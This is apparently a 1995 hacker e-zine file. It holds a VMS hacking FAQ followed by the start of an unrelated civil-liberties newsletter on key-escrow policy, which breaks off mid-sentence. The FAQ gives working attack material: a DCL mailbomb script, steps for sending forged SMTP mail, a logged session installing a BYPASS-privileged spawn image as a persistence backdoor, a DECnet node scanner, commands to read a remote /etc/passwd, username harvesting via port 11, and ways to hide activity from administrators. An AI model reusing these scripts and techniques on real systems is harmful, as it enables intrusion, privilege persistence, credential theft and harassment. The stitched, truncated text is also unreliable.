CD.COM Version 6 VMS Change Directory Command

Usage: CD command/directory

CD Display home directory, CD .. Change directory to the
current directory, node. CD [-] dir above current dir.

CD \ Change directory to your CD ..sub Change directory to a
CD HOME SYS$LOGIN directory. CD [-.sub] "sideways" subdirectory.

CD dir Change directory to the CD * Display/select the
CD [dir] [dir] directory. available subdirectories.

CD .sub Change directory to the CD . Reset current directory.
CD [.sub] [.sub] subdirectory. CD ? Display CD instructions.

CD :== @SYS$LOGIN:CD.COM DEFINE SYS$PROMPT "ON"
To make CD available from To have the VMS $ prompt
any directory you change to. display the current directory.

By The Mentor
$ goto END


Once uploaded, you should add the following line you your
LOGIN.COM:

$ CD :== @DEVICE:[PATH]CD.COM ! Replace DEVICE/PATH with user information

7. "Okay, where my .profile"

Easy. There is none. VMS startup routines (for personal accounts)
can be found in the user's home directory under the name
"LOGIN.COM".

8. "I can't seem to get to the DCL prompt"

It is possible to setup "CAPTIVE" accounts under VMS. When setup
correctly, these can be difficult to break out of, however,
in alot of cases, a simple control-C while the LOGIN.COM
is executing. Another method of keeping the LOGIN.COM
(or any commands for that fact) is to login with the
"/NOCOMMAND" flag. This flag is placed after your username
at the USERNAME prompt, and will bypass any account startup
files/commands. On a correctly setup captive account,
this will bomb out. In the even that this fails, some
places slip up by allowing a parent to spawn off other
processes. For example, if the captive account puts you
into FTP, or ALL-IN-ONE (Office automation/mail package),
it might be able to 'SPAWN' out to DCL. This can also
be prevented by simply setting up process limitation
on the account.

- VMS SMTP/Mail Information. -


1. "I am attempting to send fakemail by connecting to the SMTP port,
but everytime I issue the 'mail from', it gives me a 'Mailbox syntax
incorrect', or 'Bad arguments'. I try the standard format a *always*
use, but it *still* gives me this crap! What's the problem?"
......

Of course, it is possible to send fake mail by connecting to
the VMS machines SMTP (Simple Mail Transfer Protocol) port (25),
however, VMS "sendmail" routines tend to be a little more picky. For
example, the session below would *appear* that it should work...

------<Start Session>-------

telnet 6.6.6.6 25
Type ^] (decimal 29) <CR> to return to NetBlazer
Trying 6.6.6.10:25...
Telnet session 0 connected to bogus.add.com
220 BOGUS.ADD.COM TGV MultiNet V3.3 Rev C SMTP service ready at Fri, 6 Jan 1995
6:25:01 -0500 (EST)
helo
250 BOGUS.ADD.COM ; Hello , pleased to meet you.
mail from: bob@unknown
553 Mailbox syntax incorrect
quit
221 BOGUS.ADD.COM TGV MultiNet V3.3 Rev C SMTP service complete at Fri, 6 Jan 19
95 6:25:22 -0500 (EST)
Telnet session 0 closed: EOF

-------<End Session>---------

As you can see, however, this is not the case. Where is problem
lies is in the fact, that alot of VMS sendmail routines require "<", and
">" around "mail from" and "rcpt to" commands, and sometimes a address
(Especially the case with Multinet SMTP, and Pathway's Wollangong
Sendmail). In order to get a good mailing address to "work", try
"mail from: <bob@bogus.add.com>". Some VMS SMTP services do not require
the address, but in most cases, the ">" and "<" are required. The
same applys with the "rcpt to" command. You might need to format it
the same as the "mail from". I.E. - "rcpt to: <system>" or "rcpt to:
<system@bogus.add.com>"
.



2. "Can I use my favorite Unix sendmail holes on VMS sendmail?"

Don't be silly. No... Digital did not believe that sendmail
bugs and holes where important enough to port (grin). (It
has been rumored that one sendmail hole *was* actually ported,
but as of this time, this has not be verified.

3. "How can I code a mail bomb routine, so that I can piss off
people really good and eat 'bandwidth'."


Like this, below...

$! Simple VMS Mailbomb routine.
$! Please be someone human. Don't do this crap.
$!
$ say :== write sys$output
$ on error then goto err
$ if p4 .eqs. ""
$ then
$ say "Mailbomb V1.0 Coded By The Beaver"
$ say "1995"
$ say ""
$ say "Usage:"
$ say "MAILBOMB [Msg Subject] [File to bomb with] [Username] [# of Times]"
$ exit
$ endif
$ A=1
$ loop:
$ mail/subject='p1' 'p2' 'p3'
$ A = A + 1
$ if A .eqs. p4
$ then
$ say "Bomb Is Complete"
$ exit
$ endif
$ goto loop
$ err:
$ say "A Error has occured. Be sure all file are present and correct"
$ exit


- User/Image Privilege Informations -


1. "How are user privileges setup?"

User privleges are handled in a completely different manor
than Unix handles them. With unix, you have either

a> all priveleges (IE - "root")
b> standard user

VMS is a touch different.

For example, let say you have a field engineer that needs
a standard user account (I.E. - be able to send/receive mail,
do standard DCL commands.. Normal TMPMBX, NETMBX, and
all that), but in order to do his job, he needs to run the
online VMS diagnostics software (which is a privileged operation)
When you add the user, you can grant him "DIAGNOSE" privledges,
and normal user privileges, and he will be able do regular users
commands and run diagnostics.

What this means is that you can grant certain privileged
function to certain users, rather than giving the user
"the whole system".

This user we added would only have access to privileges that deal
with the diagnostic software. For example, he could not add
users (via "AUTHORIZE" or modify the SYSUAF.DAT).

"Privileges restrict the user of certain system functions to processes
created on the behalf of authorized users. These restrictions protect
the integrity of the operating system code, data, and resources and
thus, the integrity of user services."


"Users cannot execute an image that requires a privilege they do not
possess, unless the image is installed as a known image with the
privilege in question or the image runs within a protected subsystem"


Privileges can also be installed on images, so that when that
image is executed, that images process get the permissions
that it has been granted (this does not mean that the user gets
the privileges, but rather, just the process running this
task)

- OpenVMS VAX Guide To System Security
(6.0 manual).

Below is a listing of privileges, and a brief description.


ACNT - Lets a process use the RUN (Process) command to create
Process ($CREPRC) system service to create processes
in which accounting is disabled. A process in which
account is disabled is on whose resources are not logged.

ALLSPOOL - This privlege lets user's process allocate a spooled
device by executing the Allocate Device ($ALLOC) system
service or by users the DCL command "ALLOCATE"

ALTPRI - Allows the user's process to
1. Increase its own priority
2. Set the base priority of a target process
3. Change priority of its batch or print jobs.

AUDIT - Allows software to append to audit records to the system
security audit log file. As a result, this privilege
permits the logging of events that appear to come from the
operating system

BUGCHK - Allows the process to make bugcheck error log entries
from users, supervisor, or compatibility mode or to send
messages to the system error logger.

BYPASS - Allows the user's process full access to all protected
objects, totally bypassing UIC-based protection,
ACL protection (Access Control List) and mandatory
access controls. Users with this privilege can
modify authorization records (SYSUAF.DAT, where
usernames/passwords are stored), rights identifiers
(RIGHTSLIST.DAT), DECNet object passwords and accounts
(NETOBJECT.DAT), and unlimited file access.

CMEXEC - Allows the user's process to execute the Change Mode to
Executive system service.

CMKRNL - Allows the user's process to execute the Change Mode to
Kernel system services. These privileges allow
things like modify a multiprocessor operation (START/
CPU, STOP/CPU type commands), modifying the system
rights list (SET RIGHTS/ATTRIBUTE), change a processes
UIC (SET UIC), and other functions.

DETACH - Processes can create detached processes that have there
own UIC without the DETACH privilege, provided the
processes wants to specify a different UIC for the


DIAGNOSE - Lets a process run online diagnostic programs and intercept
and copy all messages written to the error log file.

DOWNGRADE - Permits a process to manipulate mandatory access controls.

EXQUOTA - Allows the space taken by the user's files on a given
disk volumes to exceed any usage quotas set for the user
(as determined by UIC) on those volumes.

GROUP - Allows the user's process to affect other processes in its
own group.

GRPNAME - Lets the user's process bypass access controls
and insert names into (and delete from) the logical table
of the group to which the process belongs by the use of the
Create Logical Bane and Delete Logical Name system services.

GRPPRV - When the process's group matches the group of the object
owner, the GRPPRV privilege gives a process the access rights
provided by the object's system protection field. GRPPRV
also lets a process change the protection or the
ownership of any object whose owner group matches the
process's group by using the DCL commands SET SECURITY

IMPORT - Lets a process manipulate mandatory access controls. The
privilege lets a process mount unlabeled tape volumes.
This privilege is reserved for enhanced security products
like SEVMS.

LOG_IO - Lets the user's process execute the Queue I/O request
($QIO) system service to perform logical-level I/O
operations.

MOUNT - Lets the user's process execute the mount volume QIO
function.

NETMBX - lets a process perform functions related to a DECNet
Computer Network.

OPER - Allows a process to use the Operator Communications
Manager (OPCOM) process to reply to user's request,
to broadcast messages to all terminals logged in, to
designate terminals as operator terminals and specify
the types of messages to be displayed to these operator's
terminals, and to initialize and control the log file
of operator's messages.

PFNMAP - Lets a user's process create and map page frame number
(PFN) global sections to specific pages of physical
memory or I/O device registers, no matter who is using
the pages or registers.

PHY_IO - Lets the user's process execute the Queue I/O request
($QUI) system service to perform physical-level I/O
operations.

PRMCEB - Lets the user's process create or delete a permanent
common even flag cluster by executing the Associate
Common Event Flag Cluster.

PRMGBL - Lets the user's process create or delete permanent
global section by executing the Create and Map Section
or Delete Global Section system service. In addition
, a process with this privilege (plus CMKRNL and SYSGLB
privileges) can use the Install utility (INSTALL)

PRMMBX - Lets user's process create or delete permanent mailbox
by the Create Mailbox and Assign Channel system service
or the DElete Mailbox system service. Mailboxes are
buffers in virtual memory that are treated as if they were
record oriented I/O devices. A mailbox is used for
general interprocess communications.

PSWAPM - Lets the user's process control whether is can be
swapped out of the balance set by executing the
Set Process Swap Mode system service.

READALL - Lets the process bypass existing restrictions that would
otherwise prevent the process from reading an object.
Unlike the BYPASS privilege which will permits writing and
deleting, READALL permits only the reading of objects
and allow updating of such backup-related file
characteristics as the backup date.

SECURITY - Lets a process perform security related functions such
as modifying the system password with the DCL command
SET PASSWORD /SYSTEM or modifying the system alarm
and auditing settings using the DCL command
SET AUDIT.

SETPRV - Lets user's create process whose privileges are greater
than its own. With this privilege, a user can obtain
any other privilege via the DCL command "SET PROCESS/
PRIV"


SHARE - Lets process assign channels to devices allocated to other
processes or to a nonshared device the Assign I/O Channel
system service.

SHMEM - Lets the user's process create global sections and
mailboxes (permanent or temporary_ in memory shared by
multiple processors if the process also has appropriate
PRMGBL, PRMMBX, SYSGBL, and TMPMBX privileges.

SYSGBL - Lets user;s create or delete system global sections by
executing the Create and Map Sections or the Delete
Global Section system services. With this privilege
and CMKRNL and PRMGBL, the Install command (INSTALL)
can be used.

SYSNAM - Let's user's process bypass discrepancy access
controls and insert names into the system logical
name table and delete names from that table. A
process with this privilege can use the DCL commands
ASSIGN and DEFINE to add names to the system logical
in the user or executive mode and can use the DEASSIGN
command in either mode to delete names from the
table.

SYSPRV - Lets a process access security objects by the system
protection field and also read and modify the owner
(UIC), the UIC-based protection code, and the ACL
of and object. Any processes with this privilege
can add, modify, or delete entries in the system
user authorization file (SYSUAF.DAT)

TMPMBX - Lets user's create process create a temporary mailbox
by executing the Create Mailbox and Assign Channel.

UPGRADE - Lets a process manipulate access controls. This privilege
is reserved for enhanced security products like SEVMS.

VOLPRO - Lets user's processes:
o Initialize a previously used volume with an owner
UIC different from the user's own UIC.
o Override the expiration date on a tape or
disk owned by another user.
o Use the ////FOREIGN qualifier to mount a Files-11
volume owned by another user.
o Override the owner UIC protection of volume.

WORLD - Lets user's process affect (suspend, resume, delete,
set priority, wake, etc) other processes both inside
and outside its group.


- Taken Mostly From the, "OpenVMS VAX
System Security"
(V6.0)



2. "How can I make a SUID Shell in VMS"....

Simple... You can't. Privileges are handled in a much different
method than on Unix (see "How are user privileges setup"). You
can make a program (image) that when executed, the process
of that image gains the privileges that it was "installed"
with. For example, if you write a program that needs read access
to the SYSUAF.DAT you *could* make SYSUAF.DAT world readable
(if you are on a privileged account, of course) but this
would be very, very unwise. Another method would be to
"INSTALL" the executable image and give it READALL privileges,
so that when a user's processes calls your programs, that programs
process (the image running) gets READALL privileges. Then that
process would be able to read the SYSUAF.DAT, but the user's
process would not.

With this in mind, it is possible to create a senerio similar
to that of a "SUID Shell" (but without the shell). The idea
is to give the privileges (that you want to keep ahold of)
on a program that does nothing more than make a call to
LIB$SPAWN. The idea is to write a program that will do nothing
more than create another process (that drops you to DCL)
via LIB$SPAWN, and using the VMS "INSTALL" utility, give it
the privileges that you wish that process to have. There are
several downfalls to this. To accomplish this, you would
need CMKRNL privileges yourself (your process). So your process
would already need certain privileges to pull this off. The idea
here is in the event that the user has obtained a "privileged
account"
, and wishes to remain privileged, he/she could
install a image which could be called by a normal (non-privileged)
user in which he/she could obtain the system privileges again.

Below is a sample session capture of me installing a privileged
image. The privilege I gave this image is "BYPASS" (Bypass
all security features, and the ability to modify SYSUAF.DAT
and RIGHTSLIST.DAT)


Trying...
Connected to UpperDck
Escape character is '^]'.

Upper-Dck VMS Development System



Username: SYSTEM ! Login to our privileged account
Password:
Welcome to VAX/VMS version V5.2 on node UPPERDCK
Last interactive login on Friday, 6-JAN-1995 07:17
Last non-interactive login on Thursday, 22-DEC-1994 15:51

User= SYSTEM Directory= [SYSMGR] UIC= [1,4]
Terminal= NTY5: 6-JAN-1995 07:19:01.00

sysm>basic ! I am going to use VMS BASIC, but use anything you want

VAX BASIC V2.3


Ready

10 external long function lib$spawn ! Call "SPAWN" library. The idea with this
declare long xspawn ! program is to give us another "spawned"
xspawn=lib$spawn() ! process.

save mytrap ! Save this program
Ready

exit ! and exit the VMS BASIC.
sysm>basic mytrap*.* ! Just to show our file.

Directory SYS$SYSROOT:[SYSMGR]

MYTRAP.BAS;1

Total of 1 file.
sysm>basic mytrap ! This will compile and make our object code
sysm>dir mytrap*.* ! To show our object code.

Directory SYS$SYSROOT:[SYSMGR]

MYTRAP.BAS;1 MYTRAP.OBJ;1

Total of 2 files.

sysm>link mytrap/notraceback ! Link it, with notraceback (for priv reasons)
sysm>dir mytrap*.* ! To show our executeable code.

Directory SYS$SYSROOT:[SYSMGR]

MYTRAP.BAS;1 MYTRAP.EXE;1 MYTRAP.OBJ;1

Total of 3 files.

sysm>copy mytrap.exe sys$system: ! copy it to sys$system: [this is silly]
sysm>install ! Run install to setup priv's on our imagine.
INSTALL> create mytrap/priv=(bypass) ! Give "mytrap" bypass priv's
INSTALL> list mytrap/full ! Just to show off the image priv's

DISK$VAXVMSRL5:<SYS6.SYSEXE>.EXE
MYTRAP;2 Prv
Entry access count = 0
Privileges = BYPASS

INSTALL> exit ! Get the hell out of here.
sysm>dir sys$system:mytrap.exe ! And just to show its still there

Directory SYS$SYSROOT:[SYSEXE]

MYTRAP.EXE;2 MYTRAP.EXE;1

Total of 2 files.

sysm>dir sys$system:mytrap.exe;2 /full ! Notice "world" protections...

Directory SYS$SYSROOT:[SYSEXE]

MYTRAP.EXE;2 File ID: (43314,33,0)
Size: 4/6 Owner: [1,4]
Created: 6-JAN-1995 07:20:26.35
Revised: 6-JAN-1995 07:20:41.54 (2)
Expires: <None specified>
Backup: <No backup recorded>
File organization: Sequential
File attributes: Allocation: 6, Extend: 0, Global buffer count: 0
No version limit, Contiguous best try
Record format: Fixed length 512 byte records
Record attributes: None
RMS attributes: None
Journaling enabled: None
File protection: System:RWED, Owner:RWED, Group:RE, World:
Access Cntrl List: None

sysm>set file sys$system:mytrap.exe /protection=(w:re) ! because world cant
sysm>log ! read/execute. Logout.

SYSTEM logged out at 6-JAN-1995 07:42:02.55
Connection closed by foreign host.

[Now, we make a new connection to the system to test our ]
[ "MYTRAP.EXE" with the image priv's attached to it ]

Trying...
Connected to UpperDck.
Escape character is '^]'.

Upper-Dck VMS Development System


Username: JOEBOB ! Now, log as a normal user.
Password:
Welcome to VAX/VMS version V5.2 on node UPPERDCK
Last interactive login on Friday, 6-JAN-1995 07:14

User= JOEBOB Directory= [UPPERDCK] UIC= [130,163]
Terminal= NTY6: 6-JAN-1995 07:42:12.00

UPDCK> show process/priv ! To prove that we have normal user priv's

6-JAN-1995 07:42:27.01 User: JOEBOB Process ID: 0000010F
Node: UPPERDCK Process name: "JOEBOB"

Process privileges:
TMPMBX may create temporary mailbox
NETMBX may create network device

Process rights identifiers:
INTERACTIVE
LOCAL
SYS$NODE_UPPERDCK
UPDCK> set proc/priv=bypass ! To prove I can't enabled "BYPASS" priv's
%SYSTEM-W-NOTALLPRIV, not all requested privileges authorized
UPDCK> mcr mytrap ! Run our little "privledge provider"
UPDCK> show process/priv ! To show our priv's after we exec. MYTRAP.EXE
! note that we are spawned (see PID and Proc. Name)

6-JAN-1995 07:42:46.05 User: JOEBOB Process ID: 00000110
Node: UPPERDCK Process name: "JOJBOB_1"

Process privileges:
TMPMBX may create temporary mailbox
NETMBX may create network device

Process rights identifiers:
INTERACTIVE
LOCAL
SYS$NODE_UPPERDCK
UPDCK> set process/priv=bypass ! Note, no error when we do this now.
UPDCK> show process/priv ! To prove that we have gained BYPASS

6-JAN-1995 07:42:53.37 User: JOEBOB Process ID: 00000110
Node: UPPERDCK Process name: "JOEBOB_1"

Process privileges:
TMPMBX may create temporary mailbox
NETMBX may create network device
BYPASS bypasses UIC checking


Process rights identifiers:
INTERACTIVE
LOCAL
SYS$NODE_UPPERDCK
UPDCK> logout ! I can pretty much do anything now.... Lets stop this subprocess
Process JOEBOB_1 logged out at 6-JAN-1995 07:42:59.01
UPDCK> logout ! logout completely

JOEBOB logged out at 6-JAN-1995 07:43:05.11
Connection closed by foreign host.


- Using DECNetwork's to your advantage. -


1. "What is a DECNet?"

"DECNet is a collective name for the family of communications products
(software and hardware) that allow DIGITAL operating systems to participate
in a network.

"
A DECNet network links computers into flexible configurations to exchange
information, share resources, and perform distributed processing. DECNet
distribution processing capabitlites also information to be originated
anywhere in the network."

- VMS Version 5.0 DECnet "
Guide to DECNet - VAX Networking"

DECNet can support a minimum of 2 nodes and up to 64,000 nodes,
and can support multiple OS's along with various LAN/WAN
(Using PSI, and DECNet system can be supported on packet
switching enviroments (like Tymnet and Sprintnet)) and
operating environments. (VMS, Ultrix, RSX, and with the correct
hardware, IBM PC's, VAXmate's, etc).

DECNet's allow easy access to information from system to system.


2. "
This is great, what does it mean to me."

You can use DECNets to grab information/files/programs and use
them to your own advantage (granted that security has not
been completely implemented... which is usually the case
on a vanilla/default install)

For instance, if a intruder where to break into a system
which supported a DECNet, he/she might be able to access files on
a remote system/nodes of that DECNet. As stated, DECNets
can range from local machines in that area (LAN) or
DECNet's can stretch across the world.

3. "
How would I get to that information on a remote node?"

All from DCL, using commands like "
DIRECTORY", "COPY",
"
TYPE", etc. Usually by adding in the node name at the
being of the command. For example

$ DIR NODE:: ! Example format.

or

$ DIR NODE::SYS$COMMON:[SYSEXE] ! Shows logical SYS$COMMON and the SYSEXE
! Directory on the remote node.

or

$ COPY NODE::DISK1:[BOB]SECRET.TXT [] ! The "
[]" means "wherever i am"


4. "
What if I want to connect and use the nodes interactively?".

One of two ways. Try to "
SET HOST [NODENAME]". If that fails,
try to use NCP (Network Control Program), like this.....

$ MCR NCP CONNECT NODE [NODENAME]

5. "
Well, Gee, thats wonderful. How do I find connectable nodes
that are on the DECNet"

Once again, this information can be found using the NCP (
or via a "
SHOW NETWORK") command. You might not get a
*complete* listing, because the host you are on might not
know all DECNet nodes, but it will at least get you hoping
around on the DECNet. This list can be obtain via executing.....

$ MCP NCP SHOW KNOWN NODE

This will dump a list. You can sort though the information
using the NCP connect command, and see what all sorts
of things you run into (Xyplex/DECServers, Other VMS Machines,
SNA Gateway controls, etc, etc). If you are only interested
in machine that you can get file information on, you can
us the following command file to find nodes that you can
use.



$! DECNETFIND Version 1.0
$! Coded By The Beaver
$! Jan 5th, 1995
$!
$! The intent of this code is to scan for remote, connectable nodes that
$! the VMS host knows about (Via NCP) and build a list. Once this list
$! has been created, we check to see if the remote machine is indeed
$! A> VMS (Later rev. will include Ultrix/OSF(?)) 2> Can it be directly
$! accessed via the DECNet 3> Can we read file systems on the remote node.
$! Node that are "
successful" are stored away. This prevents mucho
$! time consuming scanning by hand.
$!
$!
$ on error then goto err ! In case of Boo-Boo
$ say :== write sys$output
$ if p1 .eqs. "" ! Yes, output file helps
$ then
$ say "
DECNet VMS Node Finder Version 1.0 1995"
$ say "
Coded By The Beaver"
$ say ""
$ say "
Usage:"
$ say "
DECNETFIND [Outfile]"
$ exit
$ endif
$!
$ say "
Building Node List Via NCP....(Working)"
$!
$ mcr ncp show known nodes to nodes.out ! Fire up NCP and dump nodeslist
$ open/read in nodes.out ! Open to read
$ open/write nodelist 'p1' ! "
Success" Storage area.
$ on severe_error then continue ! So things done die on "
dir ::"'s
$!
$ loop1:
$ read/end = end in line
$ name=f$element(0,"
)", f$element(1, "(", line)) ! grab a nodename
$ if name .gts. "
("
$ then
$ say "
**************************************************************"
$ say "
Nodename: "+name
$ say ""
$ dir 'name':: ! See if we can get to it via a DECNet DIR::
$ if $severity .nes "
1"
$ then
$ say "
Status: Node Unreachable Via DECNet Dir::"
$ else
$ say "
Status: Found Good Node. [Logged]"
$ write nodelist name ! Log it.
$ endif
$ endif
$ goto loop1
$ err:
$ say "
Ouch. There has been a error!"
$ end:
$ close in
$ close nodelist ! Close up and leave, exit stage
$ delete nodes.out;* ! right
$ say "
Complete!"
$ exit


"
That works great, but I ran into a Unix (Ultrix) machine, and
when I do a 'DIR NODENAME::' it only gives me some jerk-off's
directory. Is there anyway I can grab files off the remote machine
(Ultrix) and directory listings?"

Once again, no problem. Format the command like this:

$ DIR NODE::"
/etc" ! will give remote nodes /etc directory

Or to grab the /etc/passwd file on the remote node, try....

$ TYPE NODE::"
/etc/passwd" ! And open a capture buffer.


  
6. "Can't DECNet's be protected more against this generic attack?"

Sure, by setting up proxy login access, which forces the
users to supply a password when attempting to do network
operations like above. Proxy logins are formatted below:

(This example is using the DCL COPY command)

COPY remotenode"proxyaccount"::filename filename

for example,

COPY ADAM"BOB FLASHER2"::SECURITY.TXT MYSECURITY.TXT

(BOB - The Proxy login name, FLASHER2 is the password)

However, in a vannila VMS (IE - Default installation),
proxy logins are not enabled, so DECNet surfing can
prove to be very, very useful.

7. "Are proxy logins logged.. Can I write a routine that will
attempt proxy accounts to break into remote machines?"

You bet that proxy logins are logged. Repeating invalid
attempts will inform the administrations that a "NETWORK
BREAK IN" is in effect (via the OPCOM process).


- TCP/IP Networked Machines -


1. "I have found a remote VMS machines on a TCP/IP network (I.E.
the internet). I have tried to finger the remote system in
order to start collecting usernames, I get a 'connection
refused'.... Now what?"

Connect to the SYSTAT port (Port 11). This will give jobs
currently running on the system. More than likely, this
port has been left open. With this in mind, you can
sort though all the jobs and grab usernames, while excluding
system jobs (I.E - SWAPPER, ERRFMT, AUDIT_SERVER,
JOB_CONTROL, NETACP, EVL, REMACP, SYMBIONT*,
XYP_SERVER, OPCOM, INET_SERVERS, etc....etc).

Also, I find one great trick is to look for "Student" type
accounts. That is, accounts that appear to be repetitive.
You can then predict possible usernames.

The above can be accomplisted by using the below command
(In most cases):

$ TELNET SITE.ADDRESS.COM /PORT=11


2. "On Unix machines, I can make a symbolic link to a 'questionable'
command, so that is appears that I am doing one thing when
I am really doing another (Or copying and renaming the command).
Is there anyway I can make it appear that I am doing something
that I am not?".

When the command "FINGER" is issued, a user/administrator
can see what image is currently being executed by a particular
user. For example sake, lets say you want to play with
NCP but you know that if the administrators see you in NCP,
they will get rather irate, and kick you off the system.
You can make it appear that you are doing something else
by:

a> Copying the image, renaming it, and running it. [which
may or may not work].
b> Write a routine that calls LIB$SPAWN named the command
you wish to appear to be executing, thus making it
appear via finger that you are executing another command.

Below is a quick example session to examine of senerio b. :

-----------------------<Begin Log Of Session>------------------------------
Trying...
Connected to UpperDck.
Escape character is '^]'.

UpperDck VMS Development System


Username: JOEUSER
Password:
Welcome to VAX/VMS version V5.2 on node UPPERDCK
Last interactive login on Friday, 20-JAN-1995 12:58

User= JOEUSER Directory= [JOEUSER] UIC= [JOEUSER]
Terminal= NTY12: 20-JAN-1995 13:00:16.93

$ create mail.bas
10 external long function lib$spawn ! Create a program that calls LIB$SPAWN
declare long xspawn ! This can be coded in anything you
xspawn=lib$spawn() ! want
<CRTL-Z>
$ basic mail ! Compile out LIB$SPAWN program
$ link mail ! Link it.
$ finger ! Show what we look like before we run it
20 JAN 13:02:06 Up 28 21:15:12
2+0 Jobs Load ave 0.07 0.03 0.01

Login Name Job Subsys TTY Idle Net Site
JOEUSER JOEUSER 0013d FINGER nty12 UPPERDCK
OPER Operations 0013a GLYPH nty9 40 OPSITE

$ run mail ! Makes us appear as if we are in the "MAIL" utility.
$ finger ! Take a look'see
20 JAN 13:02:15 Up 28 21:15:21
2+0 Jobs Load ave 0.07 0.03 0.01

Login Name Job Subsys TTY Idle Net Site
JOEUSER JOEUSER 0013d MAIL nty12 UPPERDCK
OPER Operations 0013a GLYPH nty9 40 OPSITE

$ log ! Stop the subprocess
Process JOEUSER_1 logged out at 20-JAN-1995 13:02:20.02
$ log ! logout
JOEUSER logged out at 20-JAN-1995 13:02:22.32

-----------------------------<End Of Log>--------------------------------



Finnal Notes:

This FAQ is far from complete, and will remain in its "beta"
stages for sometime.

I am sure that many people while question the fact of the us
of VMS BASIC as opposed to C. The reason that some examples
where given with VMS BASIC is because of a lack of a C compiler
on our local machine. Besides, it gets the job done
(sloppy).

I was mailed many terminal spoofing programs, but since the
range on these can be so large, and its one of the most
common VMS hack's, I will wait until the next release of this
FAQ until a good terminal spoofing is released with this
(Anyone ever thought of grabbing the SYS$ANNOUNCE to emulate
the login screen??).

I got alot of mail from alot of people.

Thanks to Shadow Hacker, Risc, Trouser, Spoon, and
all the boys at The Upper-Deck.

Bitwarrier for intresting conversation (besides terminal
spoofing), the ton of people that mailed me. Thanks.

- Things that need to be added/updates:

Identifying VMS machines.....
Information on the OPCOM process....
Information on accounting/user tracking...
A decent terminal spoof program

- This that we are looking for [Please mail beaver@upperdck.blkbox.
com, if you know about these hack's]

VMS Phone mail recording facility (Uses undocumented routines
found in the PHONE.EXE command)

Passing commands via VMS mail.

If you have anything remotely intresting for the next release,
please mail them to me at:

beaver@upperdck.blkbox.com

"It ain't done, but hey... It a fucking start......"

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #2, File #4 of 9

BillWatch #15

By: Voters Telecommunications Watch


VTW BillWatch: A weekly newsletter tracking US Federal legislation
affecting civil liberties. BillWatch is published every
Friday evening as long as Congress is in session.

Issue #15, Date: Sat Aug 26 15:07:25 EDT 1995

Please widely redistribute this document with this banner intact
Redistribute no more than two weeks after above date
Reproduce this alert only in relevant forums

Distributed by the Voters Telecommunications Watch (vtw@vtw.org)

*** Know of someone ANYWHERE with a fax machine but without net ***
*** access that's interested in VTW's issues? Tell them to ***
*** call and get on our weekly fax distribution list at ***
*** (718) 596-2851 (or email us their fax number. ***

To get on the distribution list for BillWatch, send mail to
listproc@vtw.org with "subscribe vtw-announce Firstname Lastname"
in the subject line.

Email vtw@vtw.org with "send billwatch" in the SUBJECT LINE
to receive the latest version of BillWatch

For permission to reproduce VTW alerts contact vtw@vtw.org
____________________________________________________________________________
TABLE OF CONTENTS

Action alerts
This week's legislative and policy rundown

'-' denotes quiet issue (no movement this week)
'+' denotes movement this week on an issue
'++' denotes movement this week with an action for YOU to do

+ Changes in US policy on cryptography
Status: Workshop at NIST Sep. 6th, 7th
- HR1978, S n.a. (Internet Freedom and Family Empowerment Act)
Status: In conference
- HR1004, S314 (1995 Communications Decency Act)
Status: In conference
- HR n.a., S714 (Child Protection, User Empowerment, and Free
Expression in Interactive Media Study Act)
Status: In conference
- Last-minute provisions of the Manager's Mark amendment to HR1555
Status: In conference
- HR n.a., S892 (Protection of Children from Computer Pornography Act)
Status: In committee
- HR n.a., S974 (Anti-Electronic Racketeering Act)
Status: In committee

____________________________________________________________________________
ACTION ALERTS

Most of the public is still in a holding pattern regarding the Internet
censorship bills that went into conference before the recess. During the
recess, activists are asking businesses that use networks like the
Internet or bulletin boards to sign onto a letter that will be sent to
Congress. It's purpose it to demonstrate to the conference committee
that the "censorship" approach will damage businesses.

There will be an action alert posted within a day or two that tells you
where to sign your business or bulletin board onto. Please watch for that
and act appropriately when you see it.

The government's "key escrow" program takes its next steps on September
6th and 7th, when a workshop will be convened at NIST outside of Washington
DC. The topics are "Export of Software Key Escrowed Encryption" (Sep 6th)
and "Desirable Characteristics for Key Escrow Agents" (Sep 7th). We've
published below two discussion papers NIST has circulated to guide the
day's discussions.

VTW will continue to monitor this process and keep you informed through
BillWatch.

____________________________________________________________________________
CHANGES IN US CRYPTOGRAPHY POLICY

In last week's BillWatch (Issue #14) we described the background
surrounding the announcement of the government's new "Key Escrow"
proposal. Details are still sketchy, probably because they haven't
been worked out yet. However detractors are calling the plan "Son of
Clipper" while proponents are hoping it will strike a balance between
industry, law enforcement, and the public.

NIST has distributed two discussion drafts to guide presentations on
the workshops on Sep. 6th and 7th. Because this is not a public-friendly
process (few of your elected representatives are likely to be involved
in this process) we have re-published these papers here for your perusal.

VTW would like to publicly thank NIST for providing this information.


August 25, 1995

MEMORANDUM FOR Registrants for the Sept. 6-7, 1995
Key Escrow Issues Meeting

From: NIST - Ed Roback

Subject: Discussion Papers

Attached for your information are two discussion papers for the
upcoming September 6-7, 1995 Key Escrow Issues Meeting to be held
at NIST. If you have any questions on this material, you may
reach me on 301-975-3696.

I look forward to seeing you in September.

Attachments
------------------------

Key Escrow Issues Meeting, September 6-7, 1995
Discussion Paper #1


Issues -- Export of
Software Key Escrowed Encryption


On August 17, 1995, the Administration announced its proposal to
permit the ready export of software encryption provided that the
products use algorithms with key space that does not exceed 64
bits and the key(s) required to decrypt messages/files are
escrowed with approved escrow agents. Under the proposal,
products will be reviewed to verify that they satisfy the
criteria and, if so, they will be transferred to the Commodity
Control List administered by the Department of Commerce where the
products can be exported under a general license (in much the
same way that 40-bit RC2/RC4 encryption is licensed today).

We are working toward creating broadly stated criteria that are
in the nature of performance specifications. To meet these
criteria, encryption products will need to implement key escrow
mechanisms that cannot be readily altered or bypassed so as to
defeat the purposes of key escrowing.

The criteria, when finalized and published, will state the
objectives, but not the exact technical method(s), by which those
objectives are satisfied. This is to provide software publishers
the flexibility to design methods for meeting our stated
objectives in a manner that is compatible with the design of
their products. There are, therefore, a number of questions we
must work together to answer in order to draft effective
criteria. These questions are:

* Avoiding multiple encryption -- How can the product be
designed so as to prevent doubling (or tripling, etc.) the
key space of the algorithm?

* Disabling the key escrow mechanism -- How can products be
made resistant to alteration that would disable or
circumvent the key escrow mechanism? How can the "static
patch" problem be avoided? How can this be tested?

* Access to escrow information -- What mechanisms must be
designed into encryption products to allow authorized access
to escrowed keys? This likely includes the identity of the
key escrow agent(s) and a serial number for the key escrow
agent to use to identify the key(s)/component(s) necessary
to decrypt the message. What other information will be
necessary to be provided to the escrow agent to identify the
necessary key(s)/component(s)? Are there other comparable
viable approaches?

* Non-escrowed use -- How can products be made so that they do
